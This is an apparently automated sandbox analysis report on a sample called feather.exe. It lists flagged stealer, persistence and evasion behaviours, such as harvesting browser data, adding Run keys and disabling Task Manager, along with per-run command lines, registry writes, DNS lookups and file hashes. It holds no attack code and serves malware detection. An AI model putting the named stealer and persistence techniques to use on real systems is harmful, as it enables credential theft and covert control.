Malware Analysis Report

2025-06-15 20:00

Sample ID 240611-wd7kvawamq
Target feather.exe
SHA256 a4c5f72184b8bb06b6202074d1c81469ea56f74dace70d09fb5c798f85d8b700
Tags
evasion execution persistence spyware stealer
score
8/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral23

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral7

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral19

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral22

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral24

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral25

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral5

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral6

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral8

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral10

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral11

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral16

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral21

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral9

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral12

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral17

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral20

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral13

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral14

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral15

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral18

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
8/10

SHA256

a4c5f72184b8bb06b6202074d1c81469ea56f74dace70d09fb5c798f85d8b700

Threat Level: Likely malicious

The file feather.exe was found to be: Likely malicious.

Malicious Activity Summary

evasion execution persistence spyware stealer

Disables Task Manager via registry modification

Command and Scripting Interpreter: PowerShell

Checks computer location settings

Drops startup file

Reads user/profile data of web browsers

Loads dropped DLL

Executes dropped EXE

Looks up external IP address via web service

Legitimate hosting services abused for malware hosting/C2

Adds Run key to start application

Drops file in System32 directory

Enumerates physical storage devices

Program crash

Unsigned PE

Opens file in notepad (likely ransom note)

Kills process with taskkill

Detects videocard installed

Suspicious behavior: EnumeratesProcesses

Suspicious use of SetWindowsHookEx

Suspicious use of WriteProcessMemory

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Suspicious use of SendNotifyMessage

Runs net.exe

Suspicious use of AdjustPrivilegeToken

Uses Task Scheduler COM API

Modifies Internet Explorer settings

Suspicious use of FindShellTrayWindow

Creates scheduled task(s)

Views/modifies file attributes

Suspicious behavior: GetForegroundWindowSpam

Modifies registry class

Checks processor information in registry

Enumerates system info in registry

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-06-11 17:50

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Analysis: behavioral23

Detonation Overview

Submitted

2024-06-11 17:49

Reported

2024-06-11 17:55

Platform

win10v2004-20240508-en

Max time kernel

137s

Max time network

155s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\vulkan-1.dll,#1

Signatures

N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\vulkan-1.dll,#1

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp

Files

N/A

Analysis: behavioral7

Detonation Overview

Submitted

2024-06-11 17:49

Reported

2024-06-11 17:55

Platform

win7-20240221-en

Max time kernel

134s

Max time network

133s

Command Line

"C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\Admin\AppData\Local\Temp\LICENSES.chromium.html

Signatures

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 505c754a28bcda01 C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000aaf38deff3e8ec4d8894b2d599e8a30700000000020000000000106600000001000020000000524c82847e936499d27bcd7a02c3b62ecf5902c66b67fa5b64b7fdff924cff1e000000000e800000000200002000000006ae5aa67ad849b168678434909a739b8f519531dc2b44a6f2593e174304111a900000005b4c41bf6f39c9d31d5e1737fd679f27f86415061bee76da60c3bfabec8e070be130a8a79526218b93e7a85f8cec05f744fee45d7ccdd38ce4dee3b4f4f68ccc1b35e4e8239f66f7379fc1f48da3dfd3b2654184d0bbae60f708022812b6d43de57eb2e9780fee76252cb9f0d136c8298d3ea816e0cd5f00d4b9a489609238d0957bc358fc80d35943a03600951ec1da40000000c4a26266c4c560f7bec0eb338f49c646fb965b4ac9d1d3931ffb476bd573aa5c1f08445587cd246d5440bb37ce00169f911fa2d775f869f4f4f16fd9eb097a55 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Toolbar C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\GPU C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\InternetRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\PageSetup C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Zoom C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{757DBF51-281B-11EF-8E23-7EEA931DE775} = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "424290255" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\DomainSuggestion C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\IETld\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\IntelliForms C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\LowRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000aaf38deff3e8ec4d8894b2d599e8a3070000000002000000000010660000000100002000000026e3ed6f231ad3c069ae0cb575519e6448caf41614c0d584ea34eed06580d055000000000e80000000020000200000003c3d671e76bcd19fc3670c601537b5eeb4e16d1c7679bfbdc62799ea432a75002000000023af3187d474cbaf6f7686de676d534e8d0aeb814f3337510a6982f4e54a266240000000c8355d7fa31256d579937beba33a323f64b6d1cdf80c2edbc70e9249e98ad189e8e298e2cca39b3194e6008dac70518b00149935208340557f557ab8947d4b13 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\SearchScopes C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "3" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing C:\Program Files\Internet Explorer\iexplore.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A

Processes

C:\Program Files\Internet Explorer\iexplore.exe

"C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\Admin\AppData\Local\Temp\LICENSES.chromium.html

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2876 CREDAT:275457 /prefetch:2

Network

Country Destination Domain Proto
US 204.79.197.200:443 ieonline.microsoft.com tcp
US 204.79.197.200:443 ieonline.microsoft.com tcp
US 204.79.197.200:443 ieonline.microsoft.com tcp

Files

C:\Users\Admin\AppData\Local\Temp\Cab4B36.tmp

MD5 ac05d27423a85adc1622c714f2cb6184
SHA1 b0fe2b1abddb97837ea0195be70ab2ff14d43198
SHA256 c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d
SHA512 6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

MD5 49aebf8cbd62d92ac215b2923fb1b9f5
SHA1 1723be06719828dda65ad804298d0431f6aff976
SHA256 b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512 bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

C:\Users\Admin\AppData\Local\Temp\Tar4C56.tmp

MD5 4ea6026cf93ec6338144661bf1202cd1
SHA1 a1dec9044f750ad887935a01430bf49322fbdcb7
SHA256 8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8
SHA512 6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 760197007fc3854891e329b8a8cdc1df
SHA1 1b7fbc61f30f8cc297914fd360269b336bebea14
SHA256 939afc7d336929a44a5744437d5986ebfa97728cfef659780f102448d9bee44f
SHA512 030954f29e502b087e5cd6853bd4f2497ab1b2b1c1423b9340be42c206d119370f67f45bc320bda10fdc5cddce61ecc485d3e2b616a63449c3a6c30894bfe499

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 712c2516192389c435b73520bbcdbc2d
SHA1 bcaa7853fa4cbce8451a65b2e46cf4b8efcc66dd
SHA256 7d80794d2b6730f253877b6c8d2723b19830a599de0821daf26cc735c377bb64
SHA512 61036d910cdb80eeb66e7e128a2d5656f927581dc0b52d2218ec1f8e4cd5cac7e6a63e208f525ef69e9fab5b95d61cd63b34d88c0c852e1174ad190d8e8bc11b

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 90ea0b4ae1b3f270bba30b1ef5241ec6
SHA1 18a1062673ba52d1fd6cad871a86c2d2f2d5085a
SHA256 52bc93fe3775c52284d22127fb2f4391d8d2f11c75484e6ca52ba45ff0039a44
SHA512 7f6bac2b40430434b26cd3889b144f2358c6a25a053cfd8069a65e18ff136db666e1c4345439fe4c7846ccb65f582a2c178d9ec2b3691ad53cabeaa4d4054bdb

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 789412af97955b358e9da9d04255192b
SHA1 7705241a4b0b12372e294fb925479bfa7012e849
SHA256 8ef880b2427ef102afc9066bf5d6875b2e6742b0e8531aa2867e8aa63cbcee3a
SHA512 d9243510d39b685f5a95b93c687f8a084350b8d7779df341e331c1b6828b291a253384bdbf4d789ae50de1f7aa986c2fceacaac5aa168e1351b82d2c084d0538

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 4aa10115c3e3c7940124ebaa194e58a3
SHA1 f111322e0947ccc428987372385ce9d8a54b2965
SHA256 22e3720d1065ec5fce2dc6a829590da27d293ba539168c3aba16543b140e599c
SHA512 83e3fcf4a23db0a4582c1f84cc4fb521991432301947864d6521a081664583e6e2ab00102bc6b38d1219437b1c37161b2ce170f309d1a297db11f757f968cb52

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 9dc2c4585c13fa36fec4d649d4619730
SHA1 556dbf8058aed2acce4c177073873b66eaabb54c
SHA256 a2c8130466130bdfbb599d628b638d801bd5e3b665d2eaa5a224c342da6cf6b5
SHA512 d6be4049ac8fb8863998ae19820708633088055c355048e17ab8dcba72632b6139d6decc35bf60ad632bd20934cf444ac0f79e191d8dbcea30c35c34899d754e

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 c1b0825637452a5c645ded430ac144ac
SHA1 7726c065928cd08a0d796a5228fe344e136c8964
SHA256 14031ab5cff480d33d3eab720d4431ce8892c47c7728e3c4db4738d729166555
SHA512 7409f667876ed401087efb0cf81e268ff5479f3f143e402d255797a5875a5ddadfd6d73024239ed9fb4570151354ce7ff06f62f3d106940fb204712f7e64abbf

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 ffd525fd72770caf9415017614694e62
SHA1 57207f0ea42f234e0f16ff4f9b97f7e6fdecfe79
SHA256 989b21449cc68466c5b3f66b06e7fcf0b3c489ff590a3249f2700a755d25acd7
SHA512 3d7d5ee802fac0dbfbad472eb52e22d4202a5c3435029ec5dd1bb16583687f43896b3cd4c82c4b3980acdfcf26db502cd5ee020bf7395653771062ee5dae463a

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 c2475449b26d4d31041d0dfa39c39571
SHA1 1674c6e9289ba5f0473744038030a52ed256cee7
SHA256 4f01c30d008667632eb92add2b8b013256467d1ad943791584e41386402f0d6b
SHA512 7d1c50fe18586ff2048d3e80dbc2a67bf223c6b582d674c71f429dccf138ef8f3cf634d67603994016222b39e5b41989281a41b85ce871add3a0ffe6d59d4e16

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 083fc1a5265343ef15c1a6785c361f88
SHA1 a8c5f0146d1bf4452896a238eee1a48bcf07b986
SHA256 10f48f9b700df267bee86c41096981f6eabea0d1164af9bb3dfea693675c234a
SHA512 b456d3c24818790df5ad6962b6bb0cb5765333214edb7878ad8d694a8a37825cea863f12c08b3397329ac8e30ce99f3d1e4fb244e638e43b0a761eca33180def

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 b3913be8935c3e6ff7abe579a5111e6f
SHA1 32bc827581a60a96308b0e26b357ef515f599eeb
SHA256 02c9e68e33b986b81639f2be443495df1d05640e53dbd8090ad31f9bf1ab9c96
SHA512 3aee3e6560dce20733355c484c14c279dc327eb2ebe8ee1b03a15b5e145630d4938b6ad49308031c0d5d4d554a1f0173399c5db03246df49b443a545cb02edf2

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 1668b1299f9a814d1e7d9777dde62602
SHA1 15bf81c5286fdc36a92451550f00477e2290cbb3
SHA256 56c7ae4cb6de37a677c58448002b230241577da4fe33019353bce030891bc8d6
SHA512 bdca1f503ef09fdbbf36dcbd005e9567394583333bd14643d3d35ba36336051688423e780c84a5294d79a7e63d799107514591612f5d691005b6bd9565780625

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 77501c7bf276c94dc24fae4b2b396de2
SHA1 8e99353da91e24c8b1937e541e09fb051614cb42
SHA256 85b3ce6804f2ecdc30488e96e8d499b1ed63adf4c3436c1ef6c9f1b57a1eef9c
SHA512 7858801db7e009e96a1be437faeb7ea45724c1a3892ea24b5789efe93d684542b373855f8bd780bfcbf24d2bc6df7f6bbc553264f9792e0d60e3c4ff27763f56

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 5d8f8b8bc90b88cfef0dbd8fb0582e13
SHA1 caed8013c77105525a69a52d802f7a075308e0dd
SHA256 c570e85bfc5b06a872dedc6afce08c964c99979a4c901c93393d650540399b98
SHA512 653726935c6fd9233d91b182d3c0c0c1a1871fc28468b9bedfd0713e63a2a855384299168a1af07da826e142ca1dec65d8210e538c3b634c55e9076b2bcc92df

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 bbd2e84fe3ac7dde488ba8cb705369aa
SHA1 11bff1b9213c0fd1afcf5e11b39e2c39a1f4e985
SHA256 09c522f3bcfc0361c0097457a7c6ba12135e1e93abf069604132ab81a8831441
SHA512 8e90aaa9eb97b8d1618ba8af19911ea06d423372010379dd36e2aa682cf0186f5cb84ec605917f68ed586e63dcbdc1786fe25dbc760a18ff4330c9577dedce29

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 46e46c745d88adb497364f2c2692a723
SHA1 4262d3e62b9d1efb1b08b5155fb1317a34a6f8ea
SHA256 968306410117a47951e30141a07010716d020d26e4fb3304af8334eddb470be5
SHA512 07b234f0454c65a23ae1a04e24dfcdb9a6c9ed65ea4c51833961206c7ecc724ff0b6a2d2bb2b992f8a41b3f65fba4945e33ffd544e4a53d55af71696c15e25fd

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 51de3a7a0660faeef27bd5a398a94b33
SHA1 8f932b0d97701084fbe0117e0eee832be8fbe9c8
SHA256 4ea0cfb595c8c5bf6457cfdf0bef55c6aac04dbe31ebb078a448c11d72cd6631
SHA512 39d7e17bfaf3c1f6e56c3192871e27c881fc768b60409f195ea2c05b51bf9074a651f87880237400ac486b3d49ed29e591c4423fb87c6206730906e3d509272a

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 a86bdbe2e230be6149fba226b1fd535b
SHA1 eae80e02f6e2d71113665e7132355cc3783bab60
SHA256 931843141af965643e026b1287b6d1dd7438b0e225506cc7b7730cbda8b7fc83
SHA512 e1855409d03b6505d0621bd4865fd201523d65bc9cce57e4ce532df98873b094fc46f0a007b12df4c810f10ea20e068f2bf56c954c6da86d39b5624ec4e543ef

Analysis: behavioral19

Detonation Overview

Submitted

2024-06-11 17:49

Reported

2024-06-11 17:56

Platform

win10v2004-20240226-en

Max time kernel

155s

Max time network

174s

Command Line

"C:\Users\Admin\AppData\Local\Temp\resources\elevate.exe"

Signatures

N/A

Processes

C:\Users\Admin\AppData\Local\Temp\resources\elevate.exe

"C:\Users\Admin\AppData\Local\Temp\resources\elevate.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=3724 --field-trial-handle=2292,i,2103142837140538807,15881446839139365070,262144 --variations-seed-version /prefetch:8

Network

Country Destination Domain Proto
US 8.8.8.8:53 154.239.44.20.in-addr.arpa udp
US 8.8.8.8:53 105.83.221.88.in-addr.arpa udp
GB 96.16.110.114:80 tcp
US 8.8.8.8:53 68.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 13.107.253.64:443 tcp
US 8.8.8.8:53 76.234.34.23.in-addr.arpa udp
US 8.8.8.8:53 232.168.11.51.in-addr.arpa udp
US 8.8.8.8:53 86.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 99.58.20.217.in-addr.arpa udp
US 8.8.8.8:53 30.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 100.58.20.217.in-addr.arpa udp
US 8.8.8.8:53 chromewebstore.googleapis.com udp
US 8.8.8.8:53 chromewebstore.googleapis.com udp
GB 142.250.187.234:443 chromewebstore.googleapis.com tcp
US 8.8.8.8:53 234.187.250.142.in-addr.arpa udp
US 8.8.8.8:53 79.239.69.13.in-addr.arpa udp

Files

N/A

Analysis: behavioral22

Detonation Overview

Submitted

2024-06-11 17:49

Reported

2024-06-11 17:55

Platform

win7-20240221-en

Max time kernel

118s

Max time network

125s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\vulkan-1.dll,#1

Signatures

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2256 wrote to memory of 2732 N/A C:\Windows\system32\rundll32.exe C:\Windows\system32\WerFault.exe
PID 2256 wrote to memory of 2732 N/A C:\Windows\system32\rundll32.exe C:\Windows\system32\WerFault.exe
PID 2256 wrote to memory of 2732 N/A C:\Windows\system32\rundll32.exe C:\Windows\system32\WerFault.exe

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\vulkan-1.dll,#1

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -u -p 2256 -s 100

Network

N/A

Files

N/A

Analysis: behavioral24

Detonation Overview

Submitted

2024-06-11 17:49

Reported

2024-06-11 17:55

Platform

win7-20240508-en

Max time kernel

121s

Max time network

124s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\nsis7z.dll,#1

Signatures

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\nsis7z.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\nsis7z.dll,#1

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2488 -s 220

Network

N/A

Files

N/A

Analysis: behavioral25

Detonation Overview

Submitted

2024-06-11 17:49

Reported

2024-06-11 17:55

Platform

win10v2004-20240426-en

Max time kernel

90s

Max time network

140s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\nsis7z.dll,#1

Signatures

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\rundll32.exe

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2976 wrote to memory of 4256 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2976 wrote to memory of 4256 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2976 wrote to memory of 4256 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\nsis7z.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\nsis7z.dll,#1

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 368 -p 4256 -ip 4256

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4256 -s 612

Network

Country Destination Domain Proto
US 8.8.8.8:53 154.239.44.20.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 75.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 104.219.191.52.in-addr.arpa udp
US 8.8.8.8:53 86.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 43.43.201.23.in-addr.arpa udp
US 8.8.8.8:53 22.236.111.52.in-addr.arpa udp

Files

